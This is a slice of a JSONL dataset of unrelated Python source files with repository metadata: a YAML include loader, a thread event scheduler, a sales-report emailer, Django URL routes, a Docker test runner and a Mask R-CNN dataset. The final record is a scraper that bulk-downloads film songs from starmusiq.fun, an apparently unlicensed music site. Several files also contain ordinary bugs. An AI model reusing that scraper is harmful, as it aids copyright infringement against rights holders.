exists, join#\t\t\t\t\t\t\t\t||\nfrom os import makedirs#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n#===============================================================================||\nfrom condor import thing#\t\t\t\t\t\t\t\t\t\t||\nfrom subtrix import subtrix#\t\t\t\t\t\t\t\t\t||\n#===============================================================================||\nhere = join(dirname(__file__),'')#\t\t\t\t\t\t\t\t\t\t\t\t||\nthere = abspath(join('../../..'))#\t\t\t\t\t\t\t\t\t\t\t\t||set path at pheonix level\nversion = '0.0.0.0.0.0'#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\nlog = False\n#===============================================================================||\nclass doc:#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t'Define Document Text from given File'#\t\t\t\t\t\t\t\t\t\t||\n\tversion = '0.0.0.0.0.0.0'#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\tdef __init__(self, doc, kind=None, cfg=None):#\t\t\t\t\t\t\t\t||\n\t\tself.doc = doc#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tself.kind = kind#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tif cfg == None:#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tcfg = f'{here}z-data_/objnql.yaml'#\t\t\t\t\t\t\t\t\t||\n\tdef append(self, text, fill=None, cfg={}):\n\t\t''' '''\n\t\tself.write(text, fill, cfg, 'a')\n\t\treturn self\n\tdef load(self, thing=None):#\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t'''Scan text and replace include codes with other text files '''\n\t\tif thing == None:#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tthing = self.doc#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\ttry:#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\twith open(thing, 'r') as doc:#\t\t\t\t\t\t\t\t\t\t||\n\t\t\t\ttext = doc.read()#\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\texcept Exception as e:#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\ttext = ''#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tm = ['Couldnt Open',thing,'due to',e]#\t\t\t\t\t\t\t\t||\n\t\t\tprint(*m)#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tif log: print('TEXT', text)\n\t\tfnl = thing.rfind('/')#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tbase_path = thing[:fnl + 1]#\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tstartpt, depth, fstart, fend = 0, 0, '<(INCL)>', '.yaml'#\t\t\t\t||\n\t\twhile True:#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tfspl = text[startpt:].find(fstart) + startpt#\t\t\t\t\t\t\t||\n\t\t\tlinepos = text[:fspl].rfind('\\n')#\t\t\t\t\t\t\t\t\t||\n\t\t\tdepth = text[linepos:fspl].find(' ')#\t\t\t\t\t\t\t\t||\n\t\t\tif depth == -1:#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\t\tdepth = 0#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tdepth += 1#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tif fspl == startpt - 1:#\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\t\tbreak#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tfspl = fspl#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tfepl = text[fspl:].find(fend) + fspl + len(fend)#\t\t\t\t\t\t||\n\t\t\tpattern = text[fspl:fepl]#\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tif pattern == '':#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\t\tstartpt = fepl + len(ntext) - len(pattern)#\t\t\t\t\t\t\t||\n\t\t\t\tcontinue#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tpath = pattern.replace(fstart, '')#\t\t\t\t\t\t\t||\n\t\t\tif log: print('Pattern', path, 'basepath', base_path)\n\t\t\tpath = join(abspath(base_path), path)\n\t\t\tif log: print('Pattern', path, 'basepath', base_path)\n\t\t\tif exists(path):#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\t\tntext = self.load(path)#\t\t\t\t\t\t\t\t\t\t||\n\t\t\t\tntext = ntext.replace('---', ' ')#\t\t\t\t\t\t\t\t||\n\t\t\t\tntext = ntext.replace('\\n', '\\n' + ' ' * depth)#\t\t\t\t\t||\n\t\t\telse:#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\t\tntext = path#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tdepth = '\\n' + ' ' * depth#\t\t||\n\t\t\ttext = 
f'{text[:fspl]}{depth}{ntext}{text[fepl:]}'#\t\t\t\t\t\t\t\t||\n\t\t\tstartpt = fepl + len(ntext) - len(path)#\t\t\t\t\t\t\t\t||\n\t\t\tpath = ''#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\treturn text#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\tdef kill(self, lvl=5):#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tif lvl == 'mustbethiscode':#\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tpass#hard delete#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\telse:#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tpass#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\treturn self#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\tdef process(self):#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tif self.fill != None:#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tself.dikt = subtrix.mechanism(self.text, self.fill).run()#\t\t\t||\n\t\t\tself.text = self.dikt#\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\treturn self#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\tdef read(self, fill=None, kind=None):#\t\t\t\t\t\t\t\t\t\t||\n\t\tself.fill, encode = fill, 0#\t\t\t\t\t\t\t\t\t\t\t||\n\t\tself.text = self.load(self.doc)#\t\t\t\t\t\t\t\t\t\t||\n\t\tself.process()#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tself.lines = self.text.split('\\n')#\t\t\t\t\t\t\t\t\t\t||\n\t\tself.table = []#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tself.frame = []#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tself.go = False#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tyield self#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\tdef search(self, term, boundaries=None):\n\t\t'''Search document text for given term and boundary conditions\n\t\t\ta none boundary should return a simple count value and true statement\n\t\t\tfor the search term in the text\n\n\t\t'''\n\n\t\treturn self\n\tdef touch(self, phile):#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\tphile = phile[:phile.rfind('/')]#\t\t\t\t\t\t\t\t\t\t||\n\t\tif not exists(phile):#\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\t\t\tprint('Touch File', phile)\n\t\t\tmakedirs(phile)#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\tdef write(self, text, fill=None, cfg={}, method='w'):#\t\t\t\t\t\t\t\t||\n\t\tif cfg == {}:\n\t\t\tcfg = {'how': 'raw'}\n\t\thow = cfg['how']\n\t\tif self.doc.replace('\\s', '') == '': #short cicuirting writing blank documents\n\t\t\treturn\n\t\tself.touch(self.doc)\n\t\tself.text, self.fill = text, fill#\t\t\t\t\t\t\t\t\t\t||\n\t\twith open(self.doc, 'w') as doc:#\t\t\t\t\t\t\t\t\t\t||\n\t\t\tif how == 'raw':\n\t\t\t\tdoc.write(str(self.text))#\t\t\t\t\t\t\t\t\t\t||\n\t\t\telif how == 'pretty':\n\t\t\t\tpprint.pprint(self.text, stream=doc)\ndef chunk(f, csize=4096):#\t\t\t\t\t\t\t\t\t\t\t\t\t\t||\n\tyield iter(lambda: f.read(csize), b'')#\t\t\t\t\t\t\t\t\t\t||\n#===========================Code Source Examples================================||\n'''\nhttp://stupidpythonideas.blogspot.com/2014/07/three-ways-to-read-files.html\n'''\n#===============================================================================||\n'''\n<(DNA)>:\n\t2018004051530:\n\t\tdoc:\n\t\t\tversion: <[active:.version]>\n\t\t\ttest: PASS\n\t\t\tdescription: >\n\t\t\twork:\n\t2018004051421:\n\t\tdoc:\n\t\t\tversion: 0.0.0.0.0.1\n\t\t\ttest: PASS\n\t\t\tdescription: >\n\t\t\t\trewrite to process template first and populate\n\t\t\t\twith given data alinearly\n\t\t\twork:\n'''\n#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@||\n","repo_name":"solubrew/fxsquirl","sub_path":"fxsquirl/objnql/txtonql.py","file_name":"txtonql.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6444460387","text":"import threading\nfrom time import sleep as slp\nimport enum\nfrom queue 
import Queue\nfrom bizare.core.call_backs import singleton\n\n\nclass Events(enum.Enum):\n DONE = 0\n INT1 = 3\n INT2 = 4\n INT3 = 5\n INT4 = 6\n INT5 = 7\n INT6 = 8\n INT7 = 9\n INT8 = 10\n INT9 = 11\n\n\n@singleton\nclass EventScheduler:\n def __init__(self):\n self.__qu = Queue()\n self.__registrations = dict()\n\n def add(self, enum):\n self.__qu.put(enum)\n\n def schedule(self):\n if not self.__qu.empty():\n e = self.__qu.get()\n e = self.__registrations.get(e)\n if e:\n e.set()\n e.clear()\n\n def register_event(self, event, type_of_event):\n self.__registrations.update({type_of_event: event})\n\n\nclass EventedTrhreadTask(threading.Thread):\n def __init__(self, name, fucn, *args, **kwargs):\n threading.Thread.__init__(self)\n self.name = name\n self.event = threading.Event()\n self._kill = True\n self._running = False\n\n self._task = fucn\n self._task_args = args\n self._task_kwargs = kwargs\n\n def get_id(self):\n if hasattr(self, '_thread_id'):\n return self._thread_id\n\n for id, thread in threading._active.items():\n if thread is self:\n return id\n\n def event_cb(self):\n return self.event\n\n def kill(self):\n self._kill = False\n\n def run(self):\n while True:\n self.event.wait() # set->clear\n\n if not self._kill:\n break\n\n self._task(*self._task_args, **self._task_kwargs)\n slp(.1)\n\n\nclass CleanUp:\n def __init__(self):\n self.__threads = []\n\n def add_thread(self, obj):\n self.__threads.append(obj)\n\n def clean(self):\n for t in self.__threads:\n t.kill()\n\n for k in self.__threads:\n if not k.event.is_set():\n k.event.set()\n else:\n k.event.clear()\n k.event.set()\n\n for t in self.__threads:\n t.join()","repo_name":"Fananos/bizare","sub_path":"bizare/core/event_basic.py","file_name":"event_basic.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7020225296","text":"\r\n#!/usr/bin/env python3\r\n\r\nimport json\r\nimport locale\r\nimport sys\r\nimport emails\r\nimport os\r\nimport reports\r\n\r\n\r\ndef load_data(filename):\r\n \"\"\"Loads the contents of filename as a JSON file.\"\"\"\r\n with open(filename) as json_file:\r\n data = json.load(json_file)\r\n return data\r\n\r\n\r\ndef format_car(car):\r\n \"\"\"Given a car dictionary, returns a nicely formatted name.\"\"\"\r\n return \"{} {} ({})\".format(\r\n car[\"car_make\"], car[\"car_model\"], car[\"car_year\"])\r\n\r\ncar_sales ={}\r\ndef calculate_sales_per_year(car, total_sales):\r\n if(car[\"car_year\"] in car_sales):\r\n car_sales[car[\"car_year\"]]=car_sales[car[\"car_year\"]]+total_sales\r\n else:\r\n car_sales[car[\"car_year\"]]=total_sales\r\n\r\ndef returns_most_popular_car_year():\r\n key=''\r\n value=0\r\n for k in car_sales:\r\n if(car_sales[k]>value):\r\n key = k\r\n value = car_sales[k]\r\n return \"The most popular year was \"+str(key)+\" with \"+str(value)+\" sales.\"\r\n\r\ndef process_data(data):\r\n \"\"\"Analyzes the data, looking for maximums.\r\n\r\n Returns a list of lines that summarize the information.\r\n \"\"\"\r\n locale.setlocale(locale.LC_ALL, 'en_US.UTF8')\r\n max_revenue = {\"revenue\": 0}\r\n max_sales = {\"total_sales\": 0}\r\n\r\n for item in data:\r\n # Calculate the revenue generated by this model (price * total_sales)\r\n # We need to convert the price from \"$1234.56\" to 1234.56\r\n item_price = locale.atof(item[\"price\"].strip(\"$\"))\r\n item_revenue = item[\"total_sales\"] * item_price\r\n if item_revenue > max_revenue[\"revenue\"]:\r\n item[\"revenue\"] = 
item_revenue\r\n max_revenue = item\r\n # TODO: also handle max sales\r\n if item[\"total_sales\"] > max_sales[\"total_sales\"]:\r\n max_sales = item\r\n # TODO: also handle most popular car_year\r\n calculate_sales_per_year(item[\"car\"],item[\"total_sales\"])\r\n\r\n summary = [\r\n \"The {} generated the most revenue: ${}\".format(\r\n format_car(max_revenue[\"car\"]), max_revenue[\"revenue\"]),\r\n \"The {} had the most sales: {}\".format(\r\n format_car(max_sales[\"car\"]), max_sales[\"total_sales\"]),\r\n returns_most_popular_car_year()\r\n ]\r\n\r\n return summary\r\n\r\n\r\ndef cars_dict_to_table(car_data):\r\n \"\"\"Turns the data in car_data into a list of lists.\"\"\"\r\n table_data = [[\"ID\", \"Car\", \"Price\", \"Total Sales\"]]\r\n for item in car_data:\r\n table_data.append([item[\"id\"], format_car(item[\"car\"]), item[\"price\"], item[\"total_sales\"]])\r\n return table_data\r\n\r\ndef pdf_generator(summary,data):\r\n table_data=cars_dict_to_table(data)\r\n result=''\r\n for line in summary:\r\n result=result+line+'
'\r\n reports.generate(\"/tmp/reportCars.pdf\", \"Sales Summary for last month\",result,table_data )\r\n\r\n\r\ndef email_send_report(summary):\r\n sender = \"automation@example.com\"\r\n receiver = \"{}@example.com\".format(os.environ.get('USER'))\r\n subject = \"Sales summary for last month\"\r\n body = '\\n'.join(summary)\r\n message = emails.generate(sender, receiver, subject, body, \"/tmp/reportCars.pdf\")\r\n emails.send(message)\r\n\r\ndef main(argv):\r\n \"\"\"Process the JSON data and generate a full report out of it.\"\"\"\r\n data = load_data(\"/home/student-04-80a26181b2f9/car_sales.json\")\r\n summary = process_data(data)\r\n # TODO: turn this into a PDF report\r\n pdf_generator(summary,data)\r\n # TODO: send the PDF report as an email attachment\r\n email_send_report(summary)\r\n\r\nif __name__ == \"__main__\":\r\n main(sys.argv)\r\n","repo_name":"thiagofnunes/Google-IT-Automation-with-Python-Professional-Certificate","sub_path":"cars.py","file_name":"cars.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"34433609018","text":"\"\"\"drfDemo URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework import permissions\nfrom rest_framework.documentation import include_docs_urls\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nschema_view = get_schema_view(\n openapi.Info(\n title='API接口文档',\n default_version='v1',\n description='接口文档平台',\n # terms_of_service='http://api.xxx.com',\n contact=openapi.Contact(email='hybpjx@qq.com'),\n license=openapi.License(name='License')\n ),\n public=True, # 允许所有人访问\n # 权限类\n # permission_classes=(permissions.IsAuthenticated,), # 允许所有人访问\n)\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path(\"api/\", include(\"students.urls\")),\n path(\"api/\", include(\"stuapi.urls\")),\n path(\"seri/\", include(\"sers.urls\")),\n path(\"req/\", include(\"req.urls\")),\n path(\"demo/\", include(\"demo.urls\")),\n path(\"school/\", include(\"school.urls\")),\n path(\"opt/\", include(\"opt.urls\")),\n\n path('docs/', include_docs_urls(title='说明文档')),\n\n path('doc/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger'),\n\n]\n","repo_name":"hybpjx/Drf-Vue-Studing","sub_path":"drfDemo/drfDemo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43199947887","text":"import os\nimport subprocess\n\nimport sys\nfrom colorclass import Color\n\n__dir__ = os.path.dirname(os.path.abspath(__file__))\n\n\ndef execute(cmds, output=False, exit=False):\n output = None if output else subprocess.PIPE\n p = subprocess.Popen(cmds, stdout=output, stderr=output)\n p.wait()\n if p.returncode != 0:\n print(Color('{red}ERROR!{/red}'))\n if output is not None:\n 
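            # This branch only runs when the child's streams were captured:
            # `output` was set to subprocess.PIPE above unless the caller
            # asked for live output, in which case the streams went straight
            # to the terminal and p.stdout is None. Minimal stdlib sketch:
            #   p = subprocess.Popen(['echo', 'hi'],
            #                        stdout=subprocess.PIPE,
            #                        stderr=subprocess.PIPE)
            #   p.wait()
            #   print(p.stdout.read().decode('utf-8'))  # -> hi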
print('STDOUT: {}'.format(p.stdout.read().decode('utf-8')))\n print('STDERR: {}'.format(p.stderr.read().decode('utf-8')))\n raise (SystemExit if exit else ChildProcessError)\n\n\ndef test_image(name, image_output=False, container_output=False, exit=False):\n print_ = print if image_output or container_output else sys.stdout.write\n print_(Color('{yellow}TESTING:{/yellow} {magenta}{}{/magenta}... ').format(name))\n directory = os.path.join(__dir__, name)\n image_name = name.lower()\n execute(['docker', 'build', '-t', image_name, directory], image_output, exit)\n execute(['docker', 'run', '--rm', image_name], container_output, exit)\n print(Color('{green}SUCCESS{/green}'))\n\n\ndef test_all(image_output=False, container_output=False):\n results = []\n for dirname in os.listdir(__dir__):\n if not os.path.isdir(dirname):\n continue\n try:\n test_image(dirname, image_output=image_output, container_output=container_output)\n except ChildProcessError:\n results.append(False)\n else:\n results.append(True)\n print('-' * 60)\n print('PASSED: {} {}/{}'.format(\n ''.join([{False: Color.red('F'), True: Color.green('.')}[x] for x in results]),\n len(list(filter(lambda x: x, results))), len(results)\n ))\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(description='Test images.')\n parser.add_argument('image', nargs='?')\n parser.add_argument('--image-output', action='store_true')\n parser.add_argument('--container-output', action='store_true')\n args = parser.parse_args()\n if args.image:\n test_image(args.image, args.image_output, args.container_output, True)\n else:\n test_all(args.image_output, args.container_output)\n","repo_name":"Nekmo/simple-monitor-alert","sub_path":"docker/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"31047654904","text":"import os\nimport pandas as pd\nimport numpy as np\n\nimport torch\nimport torchvision.transforms as T\n\nfrom torch.utils.data import Dataset\n\nfrom understanding_clouds.utils import preproces_dataframe_all_masks, get_all_masks_and_img\nfrom understanding_clouds.constants import LABELS_MAPPING\n\n\nclass MaskRCNNDataset(Dataset):\n def __init__(self, images_dirpath, transforms=None, img_scale_factor=4, subsample=None, split_ids=None, csv_name='train.csv'):\n self.images_dirpath = images_dirpath\n df = pd.read_csv(os.path.join(images_dirpath, csv_name))\n df = preproces_dataframe_all_masks(df)\n df = df.iloc[split_ids] if split_ids is not None else df\n self.df = df.iloc[::subsample] if subsample is not None else df\n self.transforms = transforms\n self._img_scale_factor = img_scale_factor\n\n def __getitem__(self, index):\n\n masks, img, labels = get_all_masks_and_img(\n self.df, index, os.path.join(self.images_dirpath, 'train_images'), scale_factor=self._img_scale_factor)\n img_filename = self.df.iloc[index]['filename']\n # img_id = self.df.iloc[index]['filename']\n labels = [LABELS_MAPPING[l] for l in labels]\n labels = [l for l in labels if l > 0]\n bboxes, masks_not_empty = [], []\n for mask in filter(lambda x: np.sum(x) > 0, masks):\n # it returns a tuple of indices where elements are not zero, it is almost an alias for np.asarray(condition).nonzero(), see np.nonzero documentation for more details\n pos = np.where(mask)\n xmin = np.min(pos[1])\n xmax = np.max(pos[1])\n ymin = np.min(pos[0])\n ymax = np.max(pos[0])\n bbox = [xmin, ymin, xmax, ymax]\n bboxes.append(bbox)\n 
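            # np.where(mask) above yields (row_idx, col_idx) arrays for the
            # nonzero pixels, so the xyxy box is just their extremes. A tiny
            # self-contained check of that logic:
            #   import numpy as np
            #   m = np.zeros((5, 5)); m[1:3, 2:4] = 1
            #   ys, xs = np.where(m)
            #   assert [xs.min(), ys.min(), xs.max(), ys.max()] == [2, 1, 3, 2]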
masks_not_empty.append(mask)\n\n img_id = torch.tensor([index])\n labels = torch.as_tensor(labels, dtype=torch.int64)\n bboxes = torch.as_tensor(bboxes, dtype=torch.float32)\n area = (bboxes[:, 3] - bboxes[:, 1]) * \\\n (bboxes[:, 2] - bboxes[:, 0])\n masks = torch.as_tensor(\n masks_not_empty, dtype=torch.uint8) / 255\n iscrowd = torch.zeros((len(masks),), dtype=torch.int64)\n\n target = {'boxes': bboxes,\n 'masks': masks,\n 'labels': labels,\n 'image_id': img_id,\n 'area': area,\n 'filename': img_filename}\n\n img = T.ToTensor()(img)\n if self.transforms is not None:\n img, target = self.transforms(img, target)\n\n return img, target\n\n def __len__(self):\n return len(self.df)\n","repo_name":"wkondrusiewicz/understanding_clouds","sub_path":"understanding_clouds/datasets/mask_rcnn_dataset.py","file_name":"mask_rcnn_dataset.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42358497057","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis is a not a general purpose script.\nThis script helps in scrapping and downloading the Music files from starmusiq.fun website.\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport zipfile\nimport io\nimport sys\n\nbaseURL = \"https://www.starmusiq.fun\"\nnavURLs = { \"top25\":\"/player/top-25-hits-by-year-month-week-starmusiq.html\",\n \"latest\":\"/latest/latest-2018-movie-songs-starmusiq.html\",\n \"composer\":\"/composers/list-of-music-composers-starmusiq.html\",\n \"movies\": \"/search/search-for-blocked-movies-starmusiq.html\"}\nnavByPage = True\ndownloadIndividualSong = True\n\n\ndef browsePage(baseURL, navURL=\"\"):\n try:\n page = requests.get(baseURL + navURL)\n soup = BeautifulSoup(page.content, \"html.parser\")\n return soup\n except requests.exceptions.RequestException as e:\n print(\"URL not reachable\")\n print(e)\n callQuit()\n\n\ndef scrapTop25List(soup):\n for div in soup.find_all(\"div\", {\"id\": \"hits_list\"}):\n for a in div.find_all(\"a\", {\"class\": \"text-warning\"}):\n songName = a.parent.parent.find(\"a\").text.split(\" - \")[0] + \" - \" + a.text\n navURL = a[\"href\"]\n yield songName, baseURL, navURL\n\n\ndef scrapComposerList(soup):\n for a in soup.find_all(\"a\"):\n if a.text == \"View Movies\":\n composerName = a[\"title\"].split(\" - \")[0][5:]\n navURL = a[\"href\"]\n yield composerName, baseURL, navURL\n if navByPage :\n for a in soup.find_all(\"a\", {\"aria-label\" : \"Previous\"}):\n navURL = a[\"href\"]\n yield \"Previous...\", baseURL, navURL\n for a in soup.find_all(\"a\", {\"aria-label\" : \"Next\"}):\n navURL = a[\"href\"]\n yield \"Next...\", baseURL, navURL\n else:\n for a in soup.find_all(\"a\", {\"aria-label\" : \"Next\"}):\n navURL = a[\"href\"]\n soup = browsePage(baseURL, navURL)\n yield from scrapComposerList(soup)\n\n\ndef scrapLatestList(soup):\n # since latest list and movie list are same, use the same function.\n yield from scrapMovieList(soup)\n\n\ndef scrapMovieList(soup):\n for a in soup.find_all(\"a\"):\n if (a.text == \"Download Album\") and not (\"single\" in a[\"href\"]):\n movieName = a[\"title\"].split(\" - \")[0]\n navURL = a[\"href\"]\n yield movieName, baseURL, navURL\n if navByPage :\n for a in soup.find_all(\"a\", {\"aria-label\" : \"Previous\"}):\n navURL = a[\"href\"]\n yield \"Previous...\", baseURL, navURL\n for a in soup.find_all(\"a\", {\"aria-label\" : \"Next\"}):\n navURL = a[\"href\"]\n yield \"Next...\", baseURL, navURL\n else:\n for a in 
soup.find_all(\"a\", {\"aria-label\": \"Next\"}):\n navURL = a[\"href\"]\n soup = browsePage(baseURL, navURL)\n yield from scrapMovieList(soup)\n\n\ndef scrapSongList(soup):\n for a in soup.find_all(\"a\"):\n if a.text.upper() == \"DOWNLOAD 320KBPS\":\n songName = a.parent.previous_sibling.find(\"a\").text.split(\" - \")[0]\n baseURL = a[\"href\"].split(\"?\")[0]\n navURL = \"?\" + a[\"href\"].split(\"?\")[1]\n yield songName, baseURL, navURL\n\n\ndef scrapAllSongZipfile(soup):\n found = False\n # Try with CSS Selector\n for div in soup.select(\"html body div.container div.row div.col-xs-12.col-sm-12.col-md-8 div.panel.panel-default div.panel-body div.row div.panel.panel-danger div.panel-body div.row div.col-md-8\"):\n for a in div.find_all(\"a\"):\n if \"320KBPS\" in str(a.text).upper():\n found = True\n songZipFileName = a.text\n baseURL = a[\"href\"].split(\"?\")[0]\n navURL = \"?\" + a[\"href\"].split(\"?\")[1]\n yield songZipFileName, baseURL, navURL\n # Try with keywords in tags\n if not found:\n for a in soup.find_all(\"a\"):\n if (\"320KBPS ZIP FILE\" or \"320KBPS ZIP\" or \"320KBPS LINK\") in str(a.text).upper():\n found = True\n songZipFileName = a.text\n baseURL = a[\"href\"].split(\"?\")[0]\n navURL = \"?\" + a[\"href\"].split(\"?\")[1]\n yield songZipFileName, baseURL, navURL\n\n if not found:\n print(\"Cannot find 320KBPS download file. For manual download use the below url..\")\n yield found\n\n\ndef scrapDownloadLink(soup):\n found = False\n for a in soup.find_all(\"a\"):\n if \"Download Now\" in a.text:\n found = True\n navURL = a[\"href\"]\n yield navURL\n if not found:\n print(\"Cannot find Download link. For manual download use the below url..\")\n yield found\n\n\ndef downloadAndExtract(url, songName = ''):\n\n try:\n print(\"Starting to download...\")\n r = requests.get(url)\n print(\"Download Completed !!!\")\n\n if not downloadIndividualSong:\n try:\n print(\"Starting to extract...\")\n z = zipfile.ZipFile(io.BytesIO(r.content))\n z.extractall(\"../Downloads/\")\n print(\"Extraction Completed !!!\")\n except:\n print(\"Couldnot Extract File. For manual download use the following url..\")\n print(url)\n else:\n try:\n print(\"Saving File...\")\n with open(\"../Downloads/\" + songName, 'w') as s:\n s.write(io.BytesIO(r.content))\n print(\"Completed !!!\")\n except:\n print(\"Couldnot save File. For manual download use the following url..\")\n print(url)\n\n\n except:\n print(\"Cannot Download File. 
For manual download use the following url..\")\n print(url)\n\n\ndef decodeSelection(keyInput, menuListLength):\n selectList = []\n for i in keyInput.split(\",\"):\n if \"q\" in i:\n callQuit()\n elif \":\" in i:\n l, h = map(int, i.split(\":\"))\n selectList += range(l, h+1)\n else:\n selectList.append(int(i))\n for i in selectList:\n if i > menuListLength:\n print(\"Enter Valid Selection\")\n yield from decodeSelection(keyInput, menuListLength)\n for i in selectList:\n yield i - 1\n\n\ndef getSelectionList(baseURL, navURL, scrapType):\n\n soup = browsePage(baseURL, navURL)\n\n menuListLength = 0\n for index, menuItem in enumerate(scrapTypeList[scrapType](soup)):\n print(index + 1, menuItem[0], menuItem[1], menuItem[2])\n menuListLength += 1\n\n keyInput = input(\"Enter selection(s) (Comma separated for multiples or Colon for range) or q to Quit\\n: \")\n\n for index, menuItem in enumerate(scrapTypeList[scrapType](soup)):\n if index in decodeSelection(keyInput, menuListLength):\n if menuItem[0] == \"Next...\":\n print(\"Getting next page..\")\n navURL = menuItem[2]\n yield from getSelectionList(baseURL, navURL, scrapType)\n elif menuItem[0] == \"Previous...\":\n print(\"Getting previous page..\")\n navURL = menuItem[2]\n yield from getSelectionList(baseURL, navURL, scrapType)\n else:\n menuName = menuItem[0]\n baseURL = menuItem[1]\n navURL = menuItem[2]\n yield menuName, baseURL, navURL\n\n\ndef callQuit():\n try:\n sys.exit(0)\n except SystemExit as e:\n pass\n\n\ndef main():\n\n def getTop25(baseURL, navURL):\n # global downloadIndividualSong = True\n for movie in getSelectionList(baseURL, navURL, \"top25\"):\n soup = browsePage(movie[1], movie[2])\n for song in scrapSongList(soup):\n if movie[0].split(\" - \")[0].upper() == song[0].upper():\n print(\"Getting download url for song\", song[0])\n soup = browsePage(song[1], song[2])\n for url in scrapDownloadLink(soup):\n if not url:\n print(url)\n else:\n print(\"Downloadable\", song[1] + url)\n downloadAndExtract(song[1] + url, song[0])\n\n def getLatest(baseURL, navURL):\n for movie in getSelectionList(baseURL, navURL, \"latest\"):\n print(\"Getting song list of\", movie[0])\n if downloadIndividualSong:\n getSongList(movie[1], movie[2])\n else:\n getSongBulk(movie[1], movie[2])\n\n def getComposer(baseURL, navURL):\n for composer in getSelectionList(baseURL, navURL, \"composer\"):\n print(\"Getting movie list of\", composer[0])\n getMovie(composer[1], composer[2])\n\n def getMovie(baseURL, navURL):\n for movie in getSelectionList(baseURL, navURL, \"movie\"):\n print(\"Getting song list of\", movie[0])\n if downloadIndividualSong:\n getSongList(movie[1], movie[2])\n else:\n getSongBulk(movie[1], movie[2])\n\n def getSongList(baseURL, navURL):\n for song in getSelectionList(baseURL, navURL, \"song\"):\n print(\"Extracting download url for song\", 